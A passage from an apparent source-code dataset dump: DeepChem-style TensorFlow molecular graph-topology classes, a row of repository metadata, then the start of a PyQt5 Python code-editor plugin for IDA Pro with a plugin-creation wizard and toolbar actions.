float value distance to a distance vector distance_matrix[im, ir, ie, :] = self.gauss_expand( ZiZj[im, ir, ie] / element, self.n_distance, self.distance_min, self.distance_max) distance_matrix_mask[im, ir, ie] = 1 else: distance_matrix[im, ir, ie, :] = 0 distance_matrix_mask[im, ir, ie] = 0 # Generate dicts dict_DTNN = { self.atom_number_placeholder: atom_number, self.atom_mask_placeholder: atom_mask, self.distance_matrix_placeholder: distance_matrix, self.distance_matrix_mask_placeholder: distance_matrix_mask } return dict_DTNN @staticmethod def gauss_expand(distance, n_distance, distance_min, distance_max): step_size = (distance_max - distance_min) / n_distance steps = np.array([distance_min + i * step_size for i in range(n_distance)]) distance_vector = np.exp(-np.square(distance - steps) / (2 * step_size**2)) return distance_vector class DAGGraphTopology(GraphTopology): """GraphTopology for DAG models """ def __init__(self, n_feat, batch_size, name='topology', max_atoms=50): self.n_feat = n_feat self.name = name self.max_atoms = max_atoms self.batch_size = batch_size self.atom_features_placeholder = tf.placeholder( dtype='float32', shape=(self.batch_size * self.max_atoms, self.n_feat), name=self.name + '_atom_features') self.parents_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms, self.max_atoms, self.max_atoms), # molecule * atom(graph) => step => features name=self.name + '_parents') self.calculation_orders_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms, self.max_atoms), # molecule * atom(graph) => step name=self.name + '_orders') self.membership_placeholder = tf.placeholder( dtype='int32', shape=(self.batch_size * self.max_atoms), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [ self.parents_placeholder, self.calculation_orders_placeholder, self.membership_placeholder ] self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_parents_placeholder(self): return self.parents_placeholder def get_calculation_orders_placeholder(self): return self.calculation_orders_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of mol_graphs into tensorflow feed_dict. Assigns the graph information in an array of ConvMol objects to the placeholder tensors for DAG models params ------ batch : np.ndarray Array of ConvMol objects returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ atoms_per_mol = [mol.get_num_atoms() for mol in batch] n_atom_features = batch[0].get_atom_features().shape[1] membership = np.concatenate( [ np.array([1] * n_atoms + [0] * (self.max_atoms - n_atoms)) for i, n_atoms in enumerate(atoms_per_mol) ], axis=0) atoms_all = [] # calculation orders for a batch of molecules parents_all = [] calculation_orders = [] for idm, mol in enumerate(batch): # padding atom features vector of each molecule with 0 atom_features_padded = np.concatenate( [ mol.get_atom_features(), np.zeros( (self.max_atoms - atoms_per_mol[idm], n_atom_features)) ], axis=0) atoms_all.append(atom_features_padded) # calculation orders for DAGs parents = mol.parents # number of DAGs should equal number of atoms assert len(parents) == atoms_per_mol[idm] parents_all.extend(parents[:]) # padding with `max_atoms` parents_all.extend([ self.max_atoms * np.ones((self.max_atoms, self.max_atoms), dtype=int) for i in range(self.max_atoms - atoms_per_mol[idm]) ]) for parent in parents: # index for an atom in `parents_all` and `atoms_all` is different, # this function changes the index from the position in the current molecule (DAGs, `parents_all`) # to the position in the batch of molecules (`atoms_all`) # only used in tf.gather on `atom_features_placeholder` calculation_orders.append(self.index_changing(parent[:, 0], idm)) # padding with `batch_size*max_atoms` calculation_orders.extend([ self.batch_size * self.max_atoms * np.ones( (self.max_atoms,), dtype=int) for i in range(self.max_atoms - atoms_per_mol[idm]) ]) atoms_all = np.concatenate(atoms_all, axis=0) parents_all = np.stack(parents_all, axis=0) calculation_orders = np.stack(calculation_orders, axis=0) atoms_dict = { self.atom_features_placeholder: atoms_all, self.membership_placeholder: membership, self.parents_placeholder: parents_all, self.calculation_orders_placeholder: calculation_orders } return atoms_dict def index_changing(self, index, n_mol): output = np.zeros_like(index) for ide, element in enumerate(index): if element < self.max_atoms: output[ide] = element + n_mol * self.max_atoms else: output[ide] = self.batch_size * self.max_atoms return output class WeaveGraphTopology(GraphTopology): """Manages placeholders associated with batch of graphs and their topology""" def __init__(self, max_atoms, n_atom_feat, n_pair_feat, name='Weave_topology'): """ Parameters ---------- max_atoms: int maximum number of atoms in a molecule n_atom_feat: int number of basic features of each atom n_pair_feat: int number of basic features of each pair """ #self.n_atoms = n_atoms self.name = name self.max_atoms = max_atoms self.n_atom_feat = n_atom_feat self.n_pair_feat = n_pair_feat self.atom_features_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.n_atom_feat), name=self.name + '_atom_features') self.atom_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms), name=self.name + '_atom_mask') self.pair_features_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.max_atoms, self.n_pair_feat), name=self.name + '_pair_features') self.pair_mask_placeholder = tf.placeholder( dtype='float32', shape=(None, self.max_atoms, self.max_atoms), name=self.name + '_pair_mask') self.membership_placeholder = tf.placeholder( dtype='int32',
shape=(None,), name=self.name + '_membership') # Define the list of tensors to be used as topology self.topology = [self.atom_mask_placeholder, self.pair_mask_placeholder] self.inputs = [self.atom_features_placeholder] self.inputs += self.topology def get_pair_features_placeholder(self): return self.pair_features_placeholder def batch_to_feed_dict(self, batch): """Converts the current batch of WeaveMol into tensorflow feed_dict. Assigns the atom features and pair features to the placeholders tensors params ------ batch : np.ndarray Array of WeaveMol returns ------- feed_dict : dict Can be merged with other feed_dicts for input into tensorflow """ # Extract atom numbers atom_feat = [] pair_feat = [] atom_mask = [] pair_mask = [] membership = [] max_atoms = self.max_atoms for im, mol in enumerate(batch): n_atoms = mol.get_num_atoms() atom_feat.append( np.pad(mol.get_atom_features(), ((0, max_atoms - n_atoms), (0, 0)), 'constant')) atom_mask.append( np.array([1] * n_atoms + [0] * (max_atoms - n_atoms), dtype=float)) pair_feat.append( np.pad(mol.get_pair_features(), ((0, max_atoms - n_atoms), ( 0, max_atoms - n_atoms), (0, 0)), 'constant')) pair_mask.append(np.array([[1]*n_atoms + [0]*(max_atoms-n_atoms)]*n_atoms + \ [[0]*max_atoms]*(max_atoms-n_atoms), dtype=float)) membership.extend([im] * n_atoms) atom_feat = np.stack(atom_feat) pair_feat = np.stack(pair_feat) atom_mask = np.stack(atom_mask) pair_mask = np.stack(pair_mask) membership = np.array(membership) # Generate dicts dict_DTNN = { self.atom_features_placeholder: atom_feat, self.pair_features_placeholder: pair_feat, self.atom_mask_placeholder: atom_mask, self.pair_mask_placeholder: pair_mask, self.membership_placeholder: membership } return dict_DTNN
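Since gauss_expand is a pure NumPy helper, the distance-to-vector expansion it performs can be sanity-checked in isolation. A short sketch with illustrative values; it restates the staticmethod locally so the TensorFlow-heavy module does not have to be imported:

import numpy as np

def gauss_expand(distance, n_distance, distance_min, distance_max):
    # mirrors DTNNGraphTopology.gauss_expand above
    step_size = (distance_max - distance_min) / n_distance
    steps = np.array([distance_min + i * step_size for i in range(n_distance)])
    return np.exp(-np.square(distance - steps) / (2 * step_size**2))

vec = gauss_expand(2.5, 100, -1.0, 18.0)  # the DTNNGraphTopology defaults
print(vec.shape)       # (100,)
print(np.argmax(vec))  # 18: the bin centered at -1.0 + 18 * 0.19 = 2.42, nearest to 2.5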
mit
-5,590,897,651,264,117,000
31.773279
101
0.635207
false
3.732995
false
false
false
techbliss/Python_editor
7.0/plugins/Code editor/pyeditor.py
1
41135
# Created by Storm Shadow www.techbliss.org # Created by Storm Shadow www.techbliss.org print "\n" #getting the box fit print " ###################################################\n" \ " # Author Storm Shadow # \n" \ " # Hotkeys # \n" \ " # NewFile: Ctrl+N #\n" \ " # OpenFile: Ctrl+O #\n" \ " # SaveFile: Ctrl+S #\n" \ " # RunScript: Ctrl+E #\n" \ " # Undo: Ctrl+Z #\n" \ " # Redo: Ctrl+Y #\n" \ " # SelectALL: Ctrl+A #\n" \ " # Paste: Ctrl+V #\n" \ " # Font: Ctrl+F #\n" \ " # ResetFolding: Ctrl+R #\n" \ " # CircleFolding: Ctrl+C #\n" \ " # PlainFolding: Ctrl+P #\n" \ " # HEX-ray Home: Ctrl+W #\n" \ " # Ida Pro Python SDK Ctrl+I #\n" \ " # IDAPROPythonGit: Ctrl+G #\n" \ " # Author: Ctrl+B #\n" \ " # Enable Reg: Alt+E #\n" \ " # Disable Reg: Alt+D #\n" \ " # Zoom in Ctrl+Shift+ + #\n" \ " # Zoom Out Ctrl+Shift+ - #\n" \ " # Profile Code Ctrl+Shift+ E #\n" \ " ###################################################\n" \ " # IDA PRO python Editor #\n" \ " ###################################################\n" import os import sys try: dn = idaapi.idadir("plugins\\Code editor") except NameError: dn = os.getcwd() try: TemplateFile = idaapi.idadir("plugins\\Code editor\\template\\Plugin_temp") except NameError: TemplateFile = os.getcwd()+r'\\template\\Plugin_temp' sys.path.insert(0, dn) sys.path.insert(0, os.getcwd()+r'\\icons') sys.path.insert(0, os.getcwd()+r'\\template') import PyQt5 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.Qsci import QsciScintilla, QsciLexerPython from PyQt5.QtGui import QFont, QFontMetrics, QColor from PyQt5.QtWidgets import QDialog, QMessageBox, QWizard, QWizardPage from PyQt5.QtCore import QCoreApplication plugin_path = "" if sys.platform == "win32": if hasattr(sys, "frozen"): plugin_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), "PyQt5", "plugins") QCoreApplication.addLibraryPath(plugin_path) else: import site for dir in site.getsitepackages(): QCoreApplication.addLibraryPath(os.path.join(dir, "PyQt5", "plugins")) elif sys.platform == "darwin": plugin_path = os.path.join(QCoreApplication.getInstallPrefix(), "Resources", "plugins") if plugin_path: QCoreApplication.addLibraryPath(plugin_path) if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'): PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True) if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'): PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True) try: import ico except ImportError: import icons.ico try: import iconsmore except ImportError: import icons.iconsmore try: import icons3 except ImportError: import icons.icons3 try: import iconf except ImportError: import icons.iconf try: import icon4 except ImportError: pass try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: def _fromUtf8(s): return s try: _encoding = QtWidgets.QApplication.UnicodeUTF8 def _translate(context, text, disambig): return QtWidgets.QApplication.translate(context, text, disambig, _encoding) except AttributeError: def _translate(context, text, disambig): return QtWidgets.QApplication.translate(context, text, disambig) class Ui_messageformForm(QtWidgets.QWidget): def setupUi1(self, messageformForm): messageformForm.setObjectName("messageformForm") messageformForm.resize(404, 169) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(messageformForm.sizePolicy().hasHeightForWidth()) messageformForm.setSizePolicy(sizePolicy) 
font = QtGui.QFont() font.setFamily("Consolas") messageformForm.setFont(font) icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap(":/icons/twa.gif"), QtGui.QIcon.Normal, QtGui.QIcon.Off) messageformForm.setWindowIcon(icon2) self.label = QtWidgets.QLabel(messageformForm) self.label.setGeometry(QtCore.QRect(40, 20, 341, 111)) font = QtGui.QFont() font.setPointSize(19) self.label.setFont(font) self.label.setObjectName("label") self.retranslateUi(messageformForm) QtCore.QMetaObject.connectSlotsByName(messageformForm) def retranslateUi(self, messageformForm): _translate = QtCore.QCoreApplication.translate messageformForm.setWindowTitle(_translate("messageformForm", "Soon to be fixed")) self.label.setText(_translate("messageformForm", "Soon to be fixed" )) class Ui_Wizard(QtWidgets.QWizard): def __init__(self, parent=None): super(Ui_Wizard, self).__init__(parent=None) Wizard.setObjectName("Wizard") Wizard.resize(762, 500) font = QtGui.QFont() font.setFamily("Calibri Light") Wizard.setFont(font) Wizard.setOptions(QtWidgets.QWizard.HelpButtonOnRight) self.wizardPage1 = QtWidgets.QWizardPage() font = QtGui.QFont() font.setFamily("Calibri Light") font.setPointSize(20) self.wizardPage1.setFont(font) self.wizardPage1.setObjectName("wizardPage1") self.textBrowser_2 = QtWidgets.QTextBrowser(self.wizardPage1) self.textBrowser_2.setGeometry(QtCore.QRect(130, 140, 421, 131)) self.textBrowser_2.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_2.setObjectName("textBrowser_2") Wizard.addPage(self.wizardPage1) self.wizardPage = QtWidgets.QWizardPage() self.wizardPage.setTitle("") self.wizardPage.setSubTitle("") self.wizardPage.setObjectName("wizardPage") self.textBrowser_4 = QtWidgets.QTextBrowser(self.wizardPage) self.textBrowser_4.setGeometry(QtCore.QRect(130, 140, 499, 239)) self.textBrowser_4.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_4.setObjectName("textBrowser_4") Wizard.addPage(self.wizardPage) self.tempwizardPage = QtWidgets.QWizardPage() self.tempwizardPage.setObjectName("tempwizardPage") self.verticalLayout = QtWidgets.QVBoxLayout(self.tempwizardPage) self.verticalLayout.setObjectName("verticalLayout") self.TemptextEdit = Qsci.QsciScintilla(self.tempwizardPage) self.TemptextEdit.setToolTip("") self.TemptextEdit.setWhatsThis("") self.TemptextEdit.setObjectName("TemptextEdit") self.verticalLayout.addWidget(self.TemptextEdit) self.horizontalLayout = QtWidgets.QHBoxLayout() self.horizontalLayout.setObjectName("horizontalLayout") spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem) self.temppushButtonopen = QtWidgets.QPushButton(self.tempwizardPage) self.temppushButtonopen.setObjectName("temppushButtonopen") self.horizontalLayout.addWidget(self.temppushButtonopen) self.temppushButtonsave = QtWidgets.QPushButton(self.tempwizardPage) self.temppushButtonsave.setObjectName("temppushButtonsave") self.horizontalLayout.addWidget(self.temppushButtonsave) self.verticalLayout.addLayout(self.horizontalLayout) Wizard.addPage(self.tempwizardPage) self.scriptwizardPage = QtWidgets.QWizardPage() self.scriptwizardPage.setObjectName("scriptwizardPage") self.textBrowser_5 = QtWidgets.QTextBrowser(self.scriptwizardPage) self.textBrowser_5.setGeometry(QtCore.QRect(120, 130, 499, 239)) self.textBrowser_5.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_5.setObjectName("textBrowser_5") Wizard.addPage(self.scriptwizardPage) self.wizardPage_3 = QtWidgets.QWizardPage() 
self.wizardPage_3.setObjectName("wizardPage_3") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.wizardPage_3) self.verticalLayout_2.setObjectName("verticalLayout_2") self.script_textEdit = Qsci.QsciScintilla(self.wizardPage_3) self.script_textEdit.setToolTip("") self.script_textEdit.setWhatsThis("") self.script_textEdit.setObjectName("script_textEdit") self.verticalLayout_2.addWidget(self.script_textEdit) self.horizontalLayout_2 = QtWidgets.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem1) self.scriptGrabpushButton = QtWidgets.QPushButton(self.wizardPage_3) self.scriptGrabpushButton.setObjectName("scriptGrabpushButton") self.horizontalLayout_2.addWidget(self.scriptGrabpushButton) self.scriptpushButtonopen = QtWidgets.QPushButton(self.wizardPage_3) self.scriptpushButtonopen.setObjectName("scriptpushButtonopen") self.horizontalLayout_2.addWidget(self.scriptpushButtonopen) self.scriptpushButtonsave = QtWidgets.QPushButton(self.wizardPage_3) self.scriptpushButtonsave.setObjectName("scriptpushButtonsave") self.horizontalLayout_2.addWidget(self.scriptpushButtonsave) self.verticalLayout_2.addLayout(self.horizontalLayout_2) Wizard.addPage(self.wizardPage_3) self.wizardPage_2 = QtWidgets.QWizardPage() font = QtGui.QFont() font.setPointSize(20) self.wizardPage_2.setFont(font) self.wizardPage_2.setObjectName("wizardPage_2") self.textBrowser_6 = QtWidgets.QTextBrowser(self.wizardPage_2) self.textBrowser_6.setGeometry(QtCore.QRect(170, 140, 411, 191)) self.textBrowser_6.setFrameShape(QtWidgets.QFrame.NoFrame) self.textBrowser_6.setObjectName("textBrowser_6") Wizard.addPage(self.wizardPage_2) #font textedit self.skrift = QFont() self.skrift.setFamily('Consolas') self.skrift.setFixedPitch(True) self.skrift.setPointSize(11) self.TemptextEdit.setFont(self.skrift) self.script_textEdit.setFont(self.skrift) #python style temp self.lexer = QsciLexerPython(self.TemptextEdit) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) #Python style scritps self.lexer = QsciLexerPython(self.script_textEdit) self.lexer.setFont(self.skrift) self.lexer.setEolFill(True) self.filename = "" #python style temp self.TemptextEdit.setAutoCompletionThreshold(0) self.TemptextEdit.setAutoCompletionThreshold(6) self.TemptextEdit.setAutoCompletionThreshold(8) self.TemptextEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) # self.TemptextEdit.setDefaultFont(self.skrift) self.TemptextEdit.setLexer(self.lexer) self.TemptextEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #python style script self.script_textEdit.setAutoCompletionThreshold(0) self.script_textEdit.setAutoCompletionThreshold(6) self.script_textEdit.setAutoCompletionThreshold(8) self.script_textEdit.setAutoCompletionSource(Qsci.QsciScintilla.AcsAPIs) # self.script_textEdit.setDefaultFont(self.skrift) self.script_textEdit.setLexer(self.lexer) self.script_textEdit.SendScintilla(QsciScintilla.SCI_STYLESETFONT, 1, 'Consolas') #line numbers temp fontmetrics = QFontMetrics(self.skrift) self.TemptextEdit.setMarginsFont(self.skrift) self.TemptextEdit.setMarginWidth(0, fontmetrics.width("00000") + 6) self.TemptextEdit.setTabWidth(4) #line numbers script fontmetrics = QFontMetrics(self.skrift) self.script_textEdit.setMarginsFont(self.skrift) self.script_textEdit.setMarginWidth(0, fontmetrics.width("00000") + 6) self.script_textEdit.setTabWidth(4) #brace temp 
self.TemptextEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch) #brace script self.script_textEdit.setBraceMatching(QsciScintilla.SloppyBraceMatch) #auto line tab =4 temp self.TemptextEdit.setAutoIndent(True) #auto line tab =4 script self.script_textEdit.setAutoIndent(True) #scrollbar self.script_textEdit.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 1) try: bs = open(TemplateFile).read() bba = QtCore.QByteArray(bs) self.bts = QtCore.QTextStream(bba) self.bheysa = self.bts.readAll() self.TemptextEdit.setText(self.bheysa) self.TemptextEdit.setMarkerBackgroundColor((QColor(66, 66, 255))) marker = self.TemptextEdit.markerDefine(PyQt5.Qsci.QsciScintilla.Rectangle, 2) self.TemptextEdit.markerAdd(7, 2) self.TemptextEdit.markerAdd(11, 2) self.TemptextEdit.markerAdd(12, 2) self.TemptextEdit.markerAdd(13, 2) self.TemptextEdit.markerAdd(14, 2) self.TemptextEdit.markerAdd(15, 2) self.TemptextEdit.markerAdd(19, 2) self.TemptextEdit.markerAdd(27, 2) self.TemptextEdit.markerAdd(34, 2) self.TemptextEdit.markerAdd(35, 2) self.TemptextEdit.markerAdd(40, 2) self.TemptextEdit.markerAdd(41, 2) self.TemptextEdit.markerAdd(42, 2) self.TemptextEdit.markerAdd(43, 2) self.TemptextEdit.markerAdd(44, 2) self.TemptextEdit.markerAdd(45, 2) self.TemptextEdit.markerAdd(48, 2) self.TemptextEdit.markerAdd(50, 2) self.TemptextEdit.markerAdd(51, 2) self.TemptextEdit.markerAdd(52, 2) self.TemptextEdit.markerAdd(53, 2) self.TemptextEdit.markerAdd(54, 2) self.TemptextEdit.markerAdd(55, 2) self.TemptextEdit.markerAdd(62, 2) self.TemptextEdit.markerAdd(63, 2) self.TemptextEdit.markerAdd(64, 2) self.TemptextEdit.markerAdd(67, 2) self.TemptextEdit.markerAdd(89, 2) self.TemptextEdit.markerAdd(97, 2) self.TemptextEdit.markerAdd(98, 2) self.TemptextEdit.markerAdd(99, 2) self.TemptextEdit.markerAdd(102, 2) except: self.TemptextEdit.setText('Plugin_temp file not found') pass self.retranslateUi2(Wizard) QtCore.QMetaObject.connectSlotsByName(Wizard) def retranslateUi2(self, Wizard): _translate = QtCore.QCoreApplication.translate Wizard.setWindowTitle(_translate("Wizard", " Ida Pro Plugin Wizard")) self.textBrowser_2.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Welcome to the plugin wizard.</p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Please follow the steps in the wizard to transform your code into a full Ida Pro plugin.</p></body></html>")) self.textBrowser_4.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">First we create the plugin loader</span></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px;
-qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Then we change the highlighted text in the template, and then save the plugin loader in Ida Pro Plugins folder.</span></p></body></html>")) self.temppushButtonopen.setText(_translate("Wizard", "Open")) self.temppushButtonsave.setText(_translate("Wizard", "Save")) self.textBrowser_5.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:8.14286pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:20pt;\">Now we grab the editor\'s current script, or open a new script.<br />Remember to save this in the right folder.<br />Plugins\\My_plugin_folder as declared in the template.</span></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:20pt;\"><br /></p></body></html>")) self.scriptGrabpushButton.setText(_translate("Wizard", "Grab from Editor")) self.scriptpushButtonopen.setText(_translate("Wizard", "Open")) self.scriptpushButtonsave.setText(_translate("Wizard", "Save")) self.textBrowser_6.setHtml(_translate("Wizard", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Calibri Light\'; font-size:20pt; font-weight:400; font-style:normal;\">\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Loader Template should now be in <br />ida pro\\plugin<br />script should be in a subfolder<br />ida pro\\plugin\\Myplugin\\</p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If the above are correct you\'re good to go!</p></body></html>")) self.temppushButtonopen.clicked.connect(self.opentemp) self.temppushButtonsave.clicked.connect(self.savetemp) self.scriptpushButtonopen.clicked.connect(self.openscript) self.scriptpushButtonsave.clicked.connect(self.savescript) self.scriptGrabpushButton.clicked.connect(self.grapper) def grapper(self): #hellotext = Ui_MainWindow # hello2= hellotext.sendgrapped # print str(hello2) messageformForm.show() def opentemp(self): print "hello" self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.TemptextEdit.setText(self.file.read()) os.chdir(str(self.path)) def savetemp(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetexttemp(self.filename) os.chdir(str(self.path)) def savetexttemp(self, fileName): textout = self.TemptextEdit.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else:
QtWidgets.QMessageBox.information(self.tempwizardPage, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) def openscript(self): print "hello" self.path = QtCore.QFileInfo(self.filename).path() # Get filename and show only .writer files (self.filename, _) = \ QtWidgets.QFileDialog.getOpenFileName(self.wizardPage_3, 'Open File', self.path, 'Python Files (*.py *.pyc *.pyw)', '') if self.filename: with open(self.filename, 'r') as self.file: self.script_textEdit.setText(self.file.read()) os.chdir(str(self.path)) def savescript(self): self.path = QtCore.QFileInfo(self.filename).path() (self.filename, _) = \ QtWidgets.QFileDialog.getSaveFileName(self.wizardPage_3, 'Save as' , self.path, 'Python Files (*.py *.pyc *.pyw)') if self.filename: self.savetextscript(self.filename) os.chdir(str(self.path)) def savetextscript(self, fileName): textout = self.script_textEdit.text() file = QtCore.QFile(fileName) if file.open(QtCore.QIODevice.WriteOnly): QtCore.QTextStream(file) << textout else: QtWidgets.QMessageBox.information(self.wizardPage_3, 'Unable to open file', file.errorString()) os.chdir(str(self.path)) from PyQt5 import Qsci import sys #app2 = QtWidgets.QApplication(sys.argv) class Ui_MainWindow(QtWidgets.QMainWindow): ARROW_MARKER_NUM = 8 def __init__(self, parent=None): super(Ui_MainWindow, self).__init__(parent=None) MainWindow.setObjectName(_fromUtf8("MainWindow")) MainWindow.resize(640, 480) self.vindu = QtWidgets.QWidget(MainWindow) self.vindu.setStyleSheet(_fromUtf8('notusedasyet')) #MainWindow.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint) self.vindu.setObjectName(_fromUtf8("vindu")) self.verticalLayout = PyQt5.QtWidgets.QVBoxLayout(self.vindu) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/ico/python.png")), QtGui.QIcon.Normal, QtGui.QIcon.On) MainWindow.setWindowIcon(icon) self.verticalLayout.setContentsMargins(0,0,0,0) self.verticalLayout.setSpacing(0) self.verticalLayout.setObjectName(_fromUtf8('verticalLayout')) self.codebox = Qsci.QsciScintilla(self.vindu) self.codebox.setToolTip(_fromUtf8("")) self.codebox.setWhatsThis(_fromUtf8("")) self.codebox.setAutoFillBackground(False) self.codebox.setFrameShape(QtWidgets.QFrame.NoFrame) self.codebox.setObjectName(_fromUtf8("codebox")) self.verticalLayout.addWidget(self.codebox) MainWindow.setCentralWidget(self.vindu) #toolbar self.toolBar = QtWidgets.QToolBar(MainWindow) self.toolBar.setAutoFillBackground(False) self.toolBar.setIconSize(QtCore.QSize(32, 32)) self.toolBar.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) self.toolBar.setObjectName(_fromUtf8("toolBar2")) MainWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar) self.toolBar.addSeparator() #toolbar2 debugger #self.toolBar2 = QtGui.QToolBar(MainWindow) #self.toolBar2.setAutoFillBackground(False) #self.toolBar2.setIconSize(QtCore.QSize(32, 32)) #self.toolBar2.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) #self.toolBar2.setObjectName(_fromUtf8("toolBar")) # MainWindow.addToolBar(QtCore.Qt.RightToolBarArea, self.toolBar2) # self.toolBar2.addSeparator() #getting ready for debugger self.codebox.setMarginSensitivity(1, True) self.codebox.marginClicked.connect(self.on_margin_clicked) self.codebox.markerDefine(QsciScintilla.FullRectangle, self.ARROW_MARKER_NUM) self.codebox.setMarkerBackgroundColor(QColor("#ee1111"), self.ARROW_MARKER_NUM) #first action Newfile self.toolBar.newAction = QtWidgets.QAction(QtGui.QIcon(":/ico/new.png"),"New",self.toolBar) self.toolBar.newAction.setStatusTip("Clear TextBox or make new document.") 
self.toolBar.newAction.setShortcut("Ctrl+N") self.toolBar.newAction.triggered.connect(self.newfile) #second Action OpenFile self.toolBar.secondAction = QtWidgets.QAction(QtGui.QIcon(":/ico/open.png"),"Open",self.toolBar) self.toolBar.secondAction.setStatusTip("Create a new document from scratch.") self.toolBar.secondAction.setShortcut("Ctrl+O") self.toolBar.secondAction.triggered.connect(self.open) # action 3 save file self.toolBar.Action3 = QtWidgets.QAction(QtGui.QIcon(":/ico/save.png"),"Save",self.toolBar) self.toolBar.Action3.setStatusTip("Save Your File.") self.toolBar.Action3.setShortcut("Ctrl+S") self.toolBar.Action3.triggered.connect(self.savefile) #action 4 run file self.toolBar.Action4 = QtWidgets.QAction(QtGui.QIcon(":/ico/run32.png"),"Run",self.toolBar) self.toolBar.Action4.setStatusTip("Run") self.toolBar.Action4.setShortcut("Ctrl+E") self.toolBar.Action4.triggered.connect(self.runto) #action 21 debug #self.toolBar2.Action21 = QtGui.QAction(QtGui.QIcon(":/ico/run32.png"),"Debug",self.toolBar) #self.toolBar2.Action21.setStatusTip("Debug File.") 